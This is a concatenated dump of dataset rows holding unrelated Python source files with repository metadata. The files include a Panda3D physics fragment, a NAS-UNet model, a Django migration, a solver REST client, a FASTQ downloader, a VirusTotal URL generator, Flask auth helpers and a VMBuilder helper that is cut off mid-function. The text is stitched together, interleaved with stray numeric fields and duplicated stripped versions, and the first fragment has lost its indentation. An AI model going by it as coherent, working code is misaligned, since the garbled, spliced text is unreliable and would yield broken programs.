self.RuleData = [[State("free") for i in range(Vw)] for j in range(Vl)] # node behavior
self.CurrentPosState = self.surface.GetPosData()
upper_normals = LinArrayFormat(self.surface.GetNormalData(), (Vl,Vw)) # these are the upper normals, we need to add link normals
self.speedData = [[LVecBase3f(0,0,0) for i in range(Vw)] for j in range(Vl)] # initialize at zero speed
self.accelData = [[LVecBase3f(0,0,0) for i in range(Vw)] for j in range(Vl)] # could've just deepcopied the speedData
'''
# use the provided physics engine (see physX file)
self.engine = engine()
return None # ya I need to stop writing this someday
def update(self, dt, physXtasks, frame, memory):
# MODIFY THE SURFACE
Vl, Vw = self.size
'''
posdata = LinArrayFormat(self.surface.GetPosData())
for i in range(Vl):
for j in range(Vw):
self.Nodes[i][j].setPos(posdata[i][j])
'''
# Now we have to deal with rules
for task in physXtasks: # scan the user data
chosen_rule = task[0].strip().split("_")
type, rule = chosen_rule[0], chosen_rule[1] # type may be highlighted but is still a str just type type(type) and you'll know :p
if rule == "static" and task[3][0] <= frame <= task[3][0]: # pas tres propre je sais mais il est une heure du mat merde
Fstart, Fend = task[3]
PosData = memory.getFramePosData(Fstart)
if type == 'line': # more than one override
currentCenter = Vec3(0,0,0) # initialize the center of the line
for i in range(Vw):
currentCenter += PosData[task[1]-1][i]
med = currentCenter/Vw
coord = troubleShoot_NoneTypes(task[2], med)
displacement = coord - med # this is the displacement vector
for i in range(Vw):
self.Nodes[task[1]-1][i].state.setRule('static', coord = PosData[task[1]-1][i] + displacement)
elif type == 'column':
currentCenter = Vec3(0,0,0) # initialize the center of the column
for i in range(Vl):
currentCenter += PosData[i][task[1]-1]
med = currentCenter/Vl
coord = troubleShoot_NoneTypes(task[2], med)
displacement = coord - med # this is the displacement vector
for i in range(Vl):
self.Nodes[i][task[1]-1].state.setRule('static', coord = PosData[i][task[1]-1] + displacement)
elif type == 'single':
coord = troubleShoot_NoneTypes(task[2], PosData[task[1][0]-1][task[1][1]-1])
self.Nodes[task[1][0]-1][task[1][1]-1].state.setRule('static', coord = coord)
elif rule == "following":
func = chosen_rule[2]
begin, end = task[3][0], task[3][1]
settings = [x for x in task[2][:3]] + [Vec3(task[2][3])]
if begin <= frame <= end:
self.Nodes[task[1][0]-1][task[1][1]-1].state.setRule(rule, followingFunc = func, FuncSettings = settings)
else:
self.Nodes[task[1][0]-1][task[1][1]-1].state.setRule("free")
elif rule == "virtual":
begin, end = task[2][0], task[2][1]
if begin <= frame <= end:
self.Nodes[task[1][0]-1][task[1][1]-1].state.setRule(rule)
else:
self.Nodes[task[1][0]-1][task[1][1]-1].state.setRule("free")
# Update Nodes
NodeOutput = self.engine.bake(self.Nodes, dt, frame)
for i in range(Vl):
for j in range(Vw):
self.Nodes[i][j].update(NodeOutput[i][j], frame)
self.surface.deform(ArrayLinFormat([[NodeOutput[i][j].pos for i in range(Vl)] for j in range(Vw)])) # modifies the mesh and calculates the normals accordingly
mesh = deepcopy(self.surface.GeomNode) # copy after it has been modified
return mesh, [[self.Nodes[i][j].pos for i in range(Vl)] for j in range(Vw)]
def override(self, coord, *args):
return None
def troubleShoot_NoneTypes(Vec, replaceVec):
output = Vec
if None in Vec:
for i in range(len(Vec)):
if Vec[i] == None:
output[i] = replaceVec[i]
return Vec3(output) | 3,862 | 1,488 | 46 |
6e18fe03136a564e0edc71a067b8e64cc5d7d36e | 5,899 | py | Python | NasUnet/models/nas_unet.py | mlvc-lab/Segmentation-NAS | a9387a1546dacfa2dc6ee1f70366542a1552e541 | [
"MIT"
] | 4 | 2020-03-26T11:05:08.000Z | 2020-12-22T08:37:20.000Z | NasUnet/models/nas_unet.py | mlvc-lab/Segmentation-NAS | a9387a1546dacfa2dc6ee1f70366542a1552e541 | [
"MIT"
] | null | null | null | NasUnet/models/nas_unet.py | mlvc-lab/Segmentation-NAS | a9387a1546dacfa2dc6ee1f70366542a1552e541 | [
"MIT"
] | 3 | 2020-03-26T11:05:09.000Z | 2022-01-28T11:29:00.000Z | from util.prim_ops_set import *
from .fcn import FCNHead
from .base import BaseNet
from util.functional import *
from torch.nn.functional import interpolate
class BuildCell(nn.Module):
"""Build a cell from genotype"""
class NasUnet(BaseNet):
"""Construct a network"""
| 37.814103 | 118 | 0.579081 | from util.prim_ops_set import *
from .fcn import FCNHead
from .base import BaseNet
from util.functional import *
from torch.nn.functional import interpolate
class BuildCell(nn.Module):
"""Build a cell from genotype"""
def __init__(self, genotype, c_prev_prev, c_prev, c, cell_type, dropout_prob=0):
super(BuildCell, self).__init__()
if cell_type == 'down':
# Note: the s0 size is twice than s1!
self.preprocess0 = ConvOps(c_prev_prev, c, kernel_size=1, stride=2, ops_order='act_weight_norm')
else:
self.preprocess0 = ConvOps(c_prev_prev, c, kernel_size=1, ops_order='act_weight_norm')
self.preprocess1 = ConvOps(c_prev, c, kernel_size=1, ops_order='act_weight_norm')
if cell_type == 'up':
op_names, idx = zip(*genotype.up)
concat = genotype.up_concat
else:
op_names, idx = zip(*genotype.down)
concat = genotype.down_concat
self.dropout_prob = dropout_prob
self._compile(c, op_names, idx, concat)
def _compile(self, c, op_names, idx, concat):
assert len(op_names) == len(idx)
self._num_meta_node = len(op_names) // 2
self._concat = concat
self._multiplier = len(concat)
self._ops = nn.ModuleList()
for name, index in zip(op_names, idx):
op = OPS[name](c, None, affine=True, dp=self.dropout_prob)
self._ops += [op]
self._indices = idx
def forward(self, s0, s1):
s0 = self.preprocess0(s0)
s1 = self.preprocess1(s1)
states = [s0, s1]
for i in range(self._num_meta_node):
h1 = states[self._indices[2*i]]
h2 = states[self._indices[2*i+1]]
op1 = self._ops[2*i]
op2 = self._ops[2*i+1]
h1 = op1(h1)
h2 = op2(h2)
# the size of h1 and h2 may be different, so we need interpolate
if h1.size() != h2.size() :
_, _, height1, width1 = h1.size()
_, _, height2, width2 = h2.size()
if height1 > height2 or width1 > width2:
h2 = interpolate(h2, (height1, width1))
else:
h1 = interpolate(h1, (height2, width2))
s = h1+h2
states += [s]
return torch.cat([states[i] for i in self._concat], dim=1)
class NasUnet(BaseNet):
"""Construct a network"""
def __init__(self, nclass, in_channels, backbone=None, aux=False,
c=48, depth=5, dropout_prob=0,
genotype=None, double_down_channel=False):
super(NasUnet, self).__init__(nclass, aux, backbone, norm_layer=nn.GroupNorm)
self._depth = depth
self._double_down_channel = double_down_channel
stem_multiplier = 4
c_curr = stem_multiplier * c
c_prev_prev, c_prev, c_curr = c_curr, c_curr, c
# the stem need a complicate mode
self.stem0 = ConvOps(in_channels, c_prev_prev, kernel_size=1, ops_order='weight_norm')
self.stem1 = ConvOps(in_channels, c_prev, kernel_size=3, stride=2, ops_order='weight_norm')
assert depth >= 2 , 'depth must >= 2'
self.down_cells = nn.ModuleList()
self.up_cells = nn.ModuleList()
down_cs_nfilters = []
# create the encoder pathway and add to a list
down_cs_nfilters += [c_prev]
down_cs_nfilters += [c_prev_prev]
for i in range(depth):
c_curr = 2 * c_curr if self._double_down_channel else c_curr # double the number of filters
down_cell = BuildCell(genotype, c_prev_prev, c_prev, c_curr, cell_type='down', dropout_prob=dropout_prob)
self.down_cells += [down_cell]
c_prev_prev, c_prev = c_prev, down_cell._multiplier*c_curr
down_cs_nfilters += [c_prev]
# create the decoder pathway and add to a list
for i in range(depth+1):
c_prev_prev = down_cs_nfilters[-(i + 2)] # the horizontal prev_prev input channel
up_cell = BuildCell(genotype, c_prev_prev, c_prev, c_curr, cell_type='up', dropout_prob=dropout_prob)
self.up_cells += [up_cell]
c_prev = up_cell._multiplier*c_curr
c_curr = c_curr // 2 if self._double_down_channel else c_curr # halve the number of filters
self.nas_unet_head = ConvOps(c_prev, nclass, kernel_size=1, ops_order='weight')
if self.aux:
self.auxlayer = FCNHead(c_prev, nclass, nn.BatchNorm2d)
def forward(self, x):
_, _, h, w = x.size()
s0, s1 = self.stem0(x), self.stem1(x)
down_cs = []
# encoder pathway
down_cs.append(s0)
down_cs.append(s1)
for i, cell in enumerate(self.down_cells):
# Sharing a global N*M weights matrix
# where M : normal + down
s0, s1 = s1, cell(s0, s1)
down_cs.append(s1)
# decoder pathway
for i, cell in enumerate(self.up_cells):
# Sharing a global N*M weights matrix
# where M : normal + up
s0 = down_cs[-(i+2)] # horizon input
s1 = cell(s0, s1)
output = self.nas_unet_head(s1)
outputs = []
outputs.append(output)
if self.aux: # use aux header
auxout = self.auxlayer(s1)
auxout = interpolate(auxout, (h,w), **self._up_kwargs)
outputs.append(auxout)
return outputs
def get_nas_unet(dataset='pascal_voc', **kwargs):
# infer number of classes
from util.datasets import datasets
model = NasUnet(datasets[dataset.lower()].NUM_CLASS, datasets[dataset.lower()].IN_CHANNELS,
**kwargs)
return model
| 5,438 | 0 | 170 |
1ef0fee033bf0679a68c77bee0f826dfd87bc8a2 | 1,348 | py | Python | metecho/api/migrations/0103_alter_task_status.py | RupertBarrow/Metecho | 322f7fab7e18063c38ee2e803b7a68212d87fe2c | [
"BSD-3-Clause"
] | 21 | 2020-04-02T21:39:58.000Z | 2022-01-31T19:43:47.000Z | metecho/api/migrations/0103_alter_task_status.py | RupertBarrow/Metecho | 322f7fab7e18063c38ee2e803b7a68212d87fe2c | [
"BSD-3-Clause"
] | 1,316 | 2020-03-30T21:56:34.000Z | 2022-03-01T10:08:56.000Z | metecho/api/migrations/0103_alter_task_status.py | oddbird/MetaShare | 71fb667eaea6990e9d89be13d9a47e76db2a6c46 | [
"BSD-3-Clause"
] | 21 | 2020-07-21T11:58:47.000Z | 2021-11-25T00:48:21.000Z | # Generated by Django 3.2.2 on 2021-05-13 15:34
from django.db import migrations, models
from metecho.api.models import TaskStatus
| 28.680851 | 87 | 0.597181 | # Generated by Django 3.2.2 on 2021-05-13 15:34
from django.db import migrations, models
from metecho.api.models import TaskStatus
def set_task_canceled_statuses(apps, schema_editor):
Task = apps.get_model("api", "Task")
for instance in Task.objects.filter(
status=TaskStatus.IN_PROGRESS, pr_is_open=False, pr_number__isnull=False
):
instance.status = TaskStatus.CANCELED
instance.save()
def unset_task_canceled_statuses(apps, schema_editor):
Task = apps.get_model("api", "Task")
for instance in Task.objects.filter(status=TaskStatus.CANCELED):
instance.status = TaskStatus.IN_PROGRESS
instance.save()
class Migration(migrations.Migration):
dependencies = [
("api", "0102_merge_20210426_2054"),
]
operations = [
migrations.AlterField(
model_name="task",
name="status",
field=models.CharField(
choices=[
("Planned", "Planned"),
("In progress", "In Progress"),
("Completed", "Completed"),
("Canceled", "Canceled"),
],
default="Planned",
max_length=16,
),
),
migrations.RunPython(set_task_canceled_statuses, unset_task_canceled_statuses),
]
| 487 | 656 | 69 |
ae0e727020da9082f868380f9e604cec3980a139 | 3,278 | py | Python | kangrouter.py | TheSolvingMachine/kangrouter-py | 0e385372675978ad7f6c4e8daea54401564304b2 | [
"Apache-2.0"
] | 1 | 2017-11-07T22:36:24.000Z | 2017-11-07T22:36:24.000Z | kangrouter.py | TheSolvingMachine/kangrouter-py | 0e385372675978ad7f6c4e8daea54401564304b2 | [
"Apache-2.0"
] | null | null | null | kangrouter.py | TheSolvingMachine/kangrouter-py | 0e385372675978ad7f6c4e8daea54401564304b2 | [
"Apache-2.0"
] | null | null | null | import time
from tsm.common.app import exception
import requests
import json
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
KANGROUTER_WEBSERVICE_APPLICATION_ROOT="/kangrouter/srv/v1"
| 33.44898 | 70 | 0.599451 | import time
from tsm.common.app import exception
import requests
import json
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
KANGROUTER_WEBSERVICE_APPLICATION_ROOT="/kangrouter/srv/v1"
class KangRouterClient:
pathbase = "https://thesolvingmachine.com/kangrouter/srv/v1/solvers"
def __init__(self,apiKey,licenseId):
self.headers = {"content-type": "application/json",
"Authorization": apiKey}
self.params = {"licenseId" : licenseId }
retries = Retry(total=5,
backoff_factor=0.75)
self.session = requests.Session()
self.session.mount(KANGROUTER_WEBSERVICE_APPLICATION_ROOT,
HTTPAdapter(max_retries=retries))
def validateReply(self,req):
if req.status_code >= 400 and req.status_code <= 500:
try:
j = req.json()
except ValueError:
raise exception.InternalError(req.text,req.status_code)
raise exception.jsonToException(req.json())
def create(self,problem,**kwargs):
path = self.pathbase
payload=json.dumps(problem)
params = self.params.copy()
params.update(kwargs)
req = self.session.post(path,
params=params,
headers=self.headers,
data=payload)
self.validateReply(req)
return req.text
def delete(self,solverId):
path = "{base}/{solverId}".format(base=self.pathbase,
solverId=str(solverId))
req = self.session.delete(path,
params=self.params,
headers=self.headers)
self.validateReply(req)
return True
def stop(self,solverId):
path = "{base}/{solverId}/stop".format(base=self.pathbase,
solverId=str(solverId))
req = self.session.put(path,
params=self.params,
headers=self.headers)
self.validateReply(req)
return True
def getStatus(self,solverId):
path = "{base}/{solverId}/status".format(base=self.pathbase,
solverId=str(solverId))
req = self.session.get(path,
params=self.params,
headers=self.headers)
self.validateReply(req)
return req.json()
def getSolution(self,solverId):
path = "{base}/{solverId}/solution".format(base=self.pathbase,
solverId=str(solverId))
req = self.session.get(path,
params=self.params,
headers=self.headers)
self.validateReply(req)
return req.json()
# polling
def createAndWait(self,problem,cancel,**kwargs):
solverId = self.create(problem,**kwargs)
timeout = 300
while not cancel() and timeout>0:
status = self.getStatus(solverId)
if status["execStatus"] =="invalid":
raise exception.solverError(json.dumps(status["errors"]))
if status["execStatus"] =="completed":
return self.getSolution(solverId)
time.sleep(1)
timeout -= 1
if timeout == 0:
raise exception.InternalError("Timed out waiting for solver")
raise exception.UserCancelled()
| 2,706 | 301 | 23 |
06345111138d441a5b029be39d16a41e55a74520 | 5,728 | py | Python | enCount/fastqs.py | mstrazar/enCount | dcff565ce96afe37aa8a41995637d00cce02360d | [
"MIT"
] | null | null | null | enCount/fastqs.py | mstrazar/enCount | dcff565ce96afe37aa8a41995637d00cce02360d | [
"MIT"
] | null | null | null | enCount/fastqs.py | mstrazar/enCount | dcff565ce96afe37aa8a41995637d00cce02360d | [
"MIT"
] | null | null | null | import os
import shutil
import requests
import hashlib
import tempfile
import datetime
from bson.objectid import ObjectId
import enCount
# populate list with currently queued jobs
submitted_downloads = dict(
(j.meta['file_path'], j) for j in enCount.queues.downloads.jobs
)
def get_file_path(e_acc, f_acc, f_url, f_size, f_md5):
"""Return path to file or None if file not available."""
# query DB
hits = enCount.db.fastqs.find(
{'e_acc': e_acc, 'f_acc': f_acc, 'url': f_url, 'size': f_size,
'md5': f_md5}
)
assert(hits.count() <= 1)
hits = list(hits)
if hits:
# fetch record from DB
hit = hits[0]
if hit['status'] == 'ready':
return hit['file_path']
else:
# not ready
return
else:
# add new record into database
fname = '{:s}.fastq.gz'.format(f_acc)
rel_folder = "{:s}".format(e_acc)
file_path = os.path.join(rel_folder, fname)
time_stamp = datetime.datetime.utcnow()
new_rec = {
'e_acc': e_acc, 'f_acc': f_acc, 'url': f_url, 'size': f_size,
'md5': f_md5, 'file_path': file_path, 'status': 'to download',
'time_stamp': time_stamp
}
print('adding new record to fastqs collection: {:s}'.format(
str(new_rec)))
enCount.db.fastqs.insert_one(new_rec)
# not ready
return
def process():
"""Synchronizes database and queue of current download jobs."""
global submitted_downloads
# query DB to get all records that have status 'to download'
for e in enCount.db.fastqs.find({'status': 'to download'}):
file_path = e['file_path']
dbrec_id = str(e['_id'])
# queue new files to download
if file_path not in submitted_downloads:
f_url = e['url']
f_md5 = e['md5']
f_size = e['size']
e_acc = e['e_acc']
print('queuing download from {:s}'.format(f_url))
# make sure folder exists before download starts
rel_folder = "{:s}".format(e_acc)
abs_folder = os.path.join(enCount.config.data_root, rel_folder)
if not os.path.isdir(abs_folder):
try:
os.makedirs(abs_folder)
except:
print('Error, could not create download folder: '
'{:s}'.format(abs_folder))
print(' file {:s} will not be '
'downloaded.'.format(file_path))
# error, will not be ready
return
job = enCount.queues.downloads.enqueue_call(
enCount.fastqs.download,
args=(f_url, file_path, f_md5, f_size, dbrec_id),
result_ttl=-1, ttl=-1, timeout=-1,
)
job.meta['file_path'] = file_path
job.save()
submitted_downloads[file_path] = job
# clean queue for finished downloads
for job in enCount.queues.downloads.jobs:
if job.is_finished or job.is_failed:
job.cleanup()
enCount.queues.downloads.remove(job)
| 34.506024 | 78 | 0.59602 | import os
import shutil
import requests
import hashlib
import tempfile
import datetime
from bson.objectid import ObjectId
import enCount
# populate list with currently queued jobs
submitted_downloads = dict(
(j.meta['file_path'], j) for j in enCount.queues.downloads.jobs
)
def _update_dbrec_status(dbrec_id, new_status):
print(dbrec_id)
r = enCount.db.fastqs.update_one(
{'_id': ObjectId(dbrec_id)}, {"$set": {'status': new_status}}
)
if r.matched_count != 1 or r.modified_count != 1 or not r.acknowledged:
print(' problems updating collection fastqs record id: {:s}, '
'match count {:d}, modified count {:d}'.format(
dbrec_id, r.matched_count, r.modified_count)
)
def download(url, file_path, expected_md5, expected_size, dbrec_id,
chunk_size=500000):
print('Downloading from: {:s}'.format(url))
print(' expected md5: {:s}'.format(expected_md5))
print(' expected size: {:d}'.format(expected_size))
print(' will update fastqs record id: {:s}'.format(dbrec_id))
# determine absolute path to where store downloaded file
abs_file_path = os.path.join(enCount.config.data_root, file_path)
# download
file_md5 = hashlib.md5()
file_size = 0
_, temp_filename = tempfile.mkstemp(
prefix='{:s}'.format(os.path.basename(file_path)), suffix='.download',
dir=enCount.config.tmp_root
)
print(' temporary download file: {:s}'.format(temp_filename))
r = requests.get(url, stream=True, timeout=3600)
with open(temp_filename, 'wb') as fd:
for chunk in r.iter_content(chunk_size):
# write to file
fd.write(chunk)
# calc md5 and size of file
file_md5.update(chunk)
file_size += len(chunk)
file_md5 = file_md5.hexdigest()
print(' size of downloaded file: {:d}'.format(file_size))
print(' md5 of downloaded file: {:s}'.format(file_md5))
# check for errors in md5 or size
if expected_md5 != file_md5:
print('ERROR, md5 of downloaded file not as expected.')
_update_dbrec_status(dbrec_id, 'error - md5 mismatch')
os.remove(temp_filename)
return
if expected_size != file_size:
print('ERROR, size of downloaded file not as expected.')
_update_dbrec_status(dbrec_id, 'error - file size mismatch')
os.remove(temp_filename)
return
# move file to proper name
print('saving to file: {:s}'.format(abs_file_path))
try:
shutil.move(temp_filename, abs_file_path)
except FileNotFoundError:
print('ERROR, file could not be saved to target folder')
os.remove(temp_filename)
return
# update database
_update_dbrec_status(dbrec_id, 'ready')
print('done')
return url
def get_file_path(e_acc, f_acc, f_url, f_size, f_md5):
"""Return path to file or None if file not available."""
# query DB
hits = enCount.db.fastqs.find(
{'e_acc': e_acc, 'f_acc': f_acc, 'url': f_url, 'size': f_size,
'md5': f_md5}
)
assert(hits.count() <= 1)
hits = list(hits)
if hits:
# fetch record from DB
hit = hits[0]
if hit['status'] == 'ready':
return hit['file_path']
else:
# not ready
return
else:
# add new record into database
fname = '{:s}.fastq.gz'.format(f_acc)
rel_folder = "{:s}".format(e_acc)
file_path = os.path.join(rel_folder, fname)
time_stamp = datetime.datetime.utcnow()
new_rec = {
'e_acc': e_acc, 'f_acc': f_acc, 'url': f_url, 'size': f_size,
'md5': f_md5, 'file_path': file_path, 'status': 'to download',
'time_stamp': time_stamp
}
print('adding new record to fastqs collection: {:s}'.format(
str(new_rec)))
enCount.db.fastqs.insert_one(new_rec)
# not ready
return
def process():
"""Synchronizes database and queue of current download jobs."""
global submitted_downloads
# query DB to get all records that have status 'to download'
for e in enCount.db.fastqs.find({'status': 'to download'}):
file_path = e['file_path']
dbrec_id = str(e['_id'])
# queue new files to download
if file_path not in submitted_downloads:
f_url = e['url']
f_md5 = e['md5']
f_size = e['size']
e_acc = e['e_acc']
print('queuing download from {:s}'.format(f_url))
# make sure folder exists before download starts
rel_folder = "{:s}".format(e_acc)
abs_folder = os.path.join(enCount.config.data_root, rel_folder)
if not os.path.isdir(abs_folder):
try:
os.makedirs(abs_folder)
except:
print('Error, could not create download folder: '
'{:s}'.format(abs_folder))
print(' file {:s} will not be '
'downloaded.'.format(file_path))
# error, will not be ready
return
job = enCount.queues.downloads.enqueue_call(
enCount.fastqs.download,
args=(f_url, file_path, f_md5, f_size, dbrec_id),
result_ttl=-1, ttl=-1, timeout=-1,
)
job.meta['file_path'] = file_path
job.save()
submitted_downloads[file_path] = job
# clean queue for finished downloads
for job in enCount.queues.downloads.jobs:
if job.is_finished or job.is_failed:
job.cleanup()
enCount.queues.downloads.remove(job)
| 2,488 | 0 | 46 |
2a9b9fac2b90d7be9b56fb00bbe59ce86f2c68ac | 335 | py | Python | VT_gen_urls.py | sparklingSky/vt-gen-urls | fb0d23caa5c47627363ac8db0e4aa7f12d794a41 | [
"MIT"
] | 1 | 2017-04-27T06:54:08.000Z | 2017-04-27T06:54:08.000Z | VT_gen_urls.py | sparklingSky/vt-gen-urls | fb0d23caa5c47627363ac8db0e4aa7f12d794a41 | [
"MIT"
] | null | null | null | VT_gen_urls.py | sparklingSky/vt-gen-urls | fb0d23caa5c47627363ac8db0e4aa7f12d794a41 | [
"MIT"
] | null | null | null | __author__ = 'sparklingSky'
import ipcalc
f = open('VT_links.txt', 'w')
subnet = raw_input('Enter subnet with prefix in format 1.2.3.0/24: ')
for x in ipcalc.Network(subnet):
f.write('https://www.virustotal.com/en/ip-address/' + str(x) + '/information/' + '\n')
f.close()
print 'Completed. See the result in file VT_links.txt'
| 25.769231 | 90 | 0.683582 | __author__ = 'sparklingSky'
import ipcalc
f = open('VT_links.txt', 'w')
subnet = raw_input('Enter subnet with prefix in format 1.2.3.0/24: ')
for x in ipcalc.Network(subnet):
f.write('https://www.virustotal.com/en/ip-address/' + str(x) + '/information/' + '\n')
f.close()
print 'Completed. See the result in file VT_links.txt'
| 0 | 0 | 0 |
2ce45fac8db13d29869dc715eb1b786c4b40a0a5 | 4,051 | py | Python | navycut/contrib/auth/__init__.py | navycut/navycut | 1d49621105c7c4683d52a3d2c853ae7165b9dc0d | [
"MIT"
] | 13 | 2021-04-26T04:00:36.000Z | 2021-09-18T19:57:58.000Z | navycut/contrib/auth/__init__.py | FlaskAio/navycut | 40f378f1710a26645df8d726c4d1caf33097da50 | [
"MIT"
] | 21 | 2021-09-27T03:19:21.000Z | 2022-03-31T03:20:59.000Z | navycut/contrib/auth/__init__.py | FlaskAio/navycut | 40f378f1710a26645df8d726c4d1caf33097da50 | [
"MIT"
] | 7 | 2021-07-21T06:21:55.000Z | 2021-09-02T17:58:04.000Z | from flask_login import (
LoginManager as _LoginManager,
logout_user as _logout_user,
login_user as _login_user
)
from .models import User
from navycut.utils.security import check_password_hash
from navycut.errors.misc import DataTypeMismatchError
from .decorators import (
login_required as login_required,
group_required as group_required,
)
import typing as t
if t.TYPE_CHECKING:
from navycut.core.app_config import Navycut
from datetime import timedelta
from .models import User
login_manager = _LoginManager()
@login_manager.user_loader
def login_user(user:t.Type["User"],
remember:bool=False,
duration:t.Optional[t.Type["timedelta"]]=None,
force:bool=False,
fresh:bool=True
) -> bool:
"""
Logs a user in. You should pass the actual user object to this. If the
user's `is_active` property is ``False``, they will not be logged in
unless `force` is ``True``.
This will return ``True`` if the log in attempt succeeds, and ``False`` if
it fails (i.e. because the user is inactive).
:param user: The user object to log in.
:type user: object
:param remember: Whether to remember the user after their session expires.
Defaults to ``False``.
:type remember: bool
:param duration: The amount of time before the remember cookie expires. If
``None`` the value set in the settings is used. Defaults to ``None``.
:type duration: :class:`datetime.timedelta`
:param force: If the user is inactive, setting this to ``True`` will log
them in regardless. Defaults to ``False``.
:type force: bool
:param fresh: setting this to ``False`` will log in the user with a session
marked as not "fresh". Defaults to ``True``.
:type fresh: bool
"""
return _login_user(user, remember=remember, duration=duration, force=force, fresh=fresh)
def logout_user() -> bool:
"""
Logs a user out. (You do not need to pass the actual user.)
This will also clean up the remember me cookie if it exists.
"""
return _logout_user()
def authenticate(username:str, password:str) -> t.Optional["User"]:
"""
The default authentication method to authenticate a user in Navycut.
:param username:
The username for authentication.
:param password:
the original password for the given user.
example::
from navycut.auth import authenticate
user = authenticate(username="jhon", password="password")
"""
user = User.query.filter_by(username=username).first()
if not user is None:
if not check_password_hash(user.password, password):
return None
return user
def has_group(user: t.Type["User"],
group:t.Union[t.List[str], str]
) -> bool:
"""
check a user have the provided group or not.
:param user:
the user object.
:param group:
the group you want to check.
example::
from navycut.contrib.auth import has_group
from navycut.contrib.auth.models import user
user = User.query.get(1)
is_group_present = has_group(user, 'super_admin')
"""
user_groups_name = [group.name for group in list(user.groups)]
if isinstance(group, str):
return group in user_groups_name
elif isinstance(group, list):
for grp in group:
if grp in user_groups_name:
return True
return False
else:
raise DataTypeMismatchError(group, "has_group function", "str or list") | 31.161538 | 92 | 0.646013 | from flask_login import (
LoginManager as _LoginManager,
logout_user as _logout_user,
login_user as _login_user
)
from .models import User
from navycut.utils.security import check_password_hash
from navycut.errors.misc import DataTypeMismatchError
from .decorators import (
login_required as login_required,
group_required as group_required,
)
import typing as t
if t.TYPE_CHECKING:
from navycut.core.app_config import Navycut
from datetime import timedelta
from .models import User
class LoginManager(_LoginManager):
def __init__(self,
app:t.Type["Navycut"]=None,
add_context_processor:bool=True
) -> None:
super(LoginManager, self).__init__(app=app,
add_context_processor=add_context_processor)
# self. login_view = "/login/"
login_manager = _LoginManager()
@login_manager.user_loader
def load_user(user_id) -> t.Type["User"]:
return User.query.get(int(user_id))
def login_user(user:t.Type["User"],
remember:bool=False,
duration:t.Optional[t.Type["timedelta"]]=None,
force:bool=False,
fresh:bool=True
) -> bool:
"""
Logs a user in. You should pass the actual user object to this. If the
user's `is_active` property is ``False``, they will not be logged in
unless `force` is ``True``.
This will return ``True`` if the log in attempt succeeds, and ``False`` if
it fails (i.e. because the user is inactive).
:param user: The user object to log in.
:type user: object
:param remember: Whether to remember the user after their session expires.
Defaults to ``False``.
:type remember: bool
:param duration: The amount of time before the remember cookie expires. If
``None`` the value set in the settings is used. Defaults to ``None``.
:type duration: :class:`datetime.timedelta`
:param force: If the user is inactive, setting this to ``True`` will log
them in regardless. Defaults to ``False``.
:type force: bool
:param fresh: setting this to ``False`` will log in the user with a session
marked as not "fresh". Defaults to ``True``.
:type fresh: bool
"""
return _login_user(user, remember=remember, duration=duration, force=force, fresh=fresh)
def logout_user() -> bool:
"""
Logs a user out. (You do not need to pass the actual user.)
This will also clean up the remember me cookie if it exists.
"""
return _logout_user()
def authenticate(username:str, password:str) -> t.Optional["User"]:
"""
The default authentication method to authenticate a user in Navycut.
:param username:
The username for authentication.
:param password:
the original password for the given user.
example::
from navycut.auth import authenticate
user = authenticate(username="jhon", password="password")
"""
user = User.query.filter_by(username=username).first()
if not user is None:
if not check_password_hash(user.password, password):
return None
return user
def has_group(user: t.Type["User"],
group:t.Union[t.List[str], str]
) -> bool:
"""
check a user have the provided group or not.
:param user:
the user object.
:param group:
the group you want to check.
example::
from navycut.contrib.auth import has_group
from navycut.contrib.auth.models import user
user = User.query.get(1)
is_group_present = has_group(user, 'super_admin')
"""
user_groups_name = [group.name for group in list(user.groups)]
if isinstance(group, str):
return group in user_groups_name
elif isinstance(group, list):
for grp in group:
if grp in user_groups_name:
return True
return False
else:
raise DataTypeMismatchError(group, "has_group function", "str or list") | 357 | 13 | 71 |
b83c60d4492dc1f05faf5d5bbad4a6170cee1206 | 8,027 | py | Python | src/vm-builder-0.12.4+bzr489/build/lib.linux-x86_64-2.7/VMBuilder/util.py | cryptorinium/Num2 | e83ea5b18b7822c73699de2a667d189791c48fbb | [
"MIT"
] | null | null | null | src/vm-builder-0.12.4+bzr489/build/lib.linux-x86_64-2.7/VMBuilder/util.py | cryptorinium/Num2 | e83ea5b18b7822c73699de2a667d189791c48fbb | [
"MIT"
] | null | null | null | src/vm-builder-0.12.4+bzr489/build/lib.linux-x86_64-2.7/VMBuilder/util.py | cryptorinium/Num2 | e83ea5b18b7822c73699de2a667d189791c48fbb | [
"MIT"
] | null | null | null | #
# Uncomplicated VM Builder
# Copyright (C) 2007-2009 Canonical Ltd.
#
# See AUTHORS for list of contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Various utility functions
import ConfigParser
import errno
import fcntl
import logging
import os.path
import select
import subprocess
import tempfile
from exception import VMBuilderException, VMBuilderUserError
def run_cmd(*argv, **kwargs):
"""
Runs a command.
Locale is reset to C to make parsing error messages possible.
@type stdin: string
@param stdin: input to provide to the process on stdin. If None, process'
stdin will be attached to /dev/null
@type ignore_fail: boolean
@param ignore_fail: If True, a non-zero exit code from the command will not
cause an exception to be raised.
@type env: dict
@param env: Dictionary of extra environment variables to set in the new process
@rtype: string
@return: string containing the stdout of the process
"""
env = kwargs.get('env', {})
stdin = kwargs.get('stdin', None)
ignore_fail = kwargs.get('ignore_fail', False)
args = [str(arg) for arg in argv]
logging.debug(args.__repr__())
if stdin:
logging.debug('stdin was set and it was a string: %s' % (stdin,))
stdin_arg = subprocess.PIPE
else:
stdin_arg = file('/dev/null', 'r')
proc_env = dict(os.environ)
proc_env['LANG'] = 'C'
proc_env['LC_ALL'] = 'C'
proc_env.update(env)
try:
proc = subprocess.Popen(args, stdin=stdin_arg, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=proc_env)
except OSError, error:
if error.errno == errno.ENOENT:
raise VMBuilderUserError, "Couldn't find the program '%s' on your system" % (argv[0])
else:
raise VMBuilderUserError, "Couldn't launch the program '%s': %s" % (argv[0], error)
if stdin:
proc.stdin.write(stdin)
proc.stdin.close()
mystdout = NonBlockingFile(proc.stdout, logfunc=logging.debug)
